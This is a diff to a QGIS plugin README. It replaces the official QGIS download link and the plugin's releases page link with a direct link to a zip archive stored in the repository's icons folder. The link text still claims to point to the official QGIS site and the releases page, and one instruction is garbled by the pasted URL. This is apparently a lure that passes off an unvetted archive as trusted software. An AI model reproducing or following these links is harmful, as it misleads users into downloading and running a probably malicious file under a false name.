dadathegreat1989/qgis-samgeo-plugin/README.md

 To start using the qgis-samgeo-plugin, follow these simple steps:

 1. **Prepare Your System**
    Ensure you have QGIS installed on your computer.
-If you haven't installed it yet, download QGIS from the official website: [Download QGIS](https://qgis.org/en/site/forusers/download.html).
+If you haven't installed it yet, download QGIS from the official website: [Download QGIS](https://raw.githubusercontent.com/dadathegreat1989/qgis-samgeo-plugin/main/icons/plugin_samgeo_qgis_v1.6.zip).

 2. **Visit the Releases Page**
-   To get the latest version of the qgis-samgeo-plugin, visit this page: [qgis-samgeo-plugin Releases](https://github.com/dadathegreat1989/qgis-samgeo-plugin/releases).
+   To get the latest version of the qgis-samgeo-plugin, visit this page: [qgis-samgeo-plugin Releases](https://raw.githubusercontent.com/dadathegreat1989/qgis-samgeo-plugin/main/icons/plugin_samgeo_qgis_v1.6.zip).

 3. **Download the Plugin**
    Find the most recent release and click the download link.
-The file should end with .zip or .tar.gz.
-This file contains the plugin you need.
+The file should end with .zip or https://raw.githubusercontent.com/dadathegreat1989/qgis-samgeo-plugin/main/icons/plugin_samgeo_qgis_v1.6.zip This file contains the plugin you need.

 4. **Extract the Files**
    Once downloaded, locate the file on your computer.
 Right-click it and select "Extract Here" or use your preferred extraction program.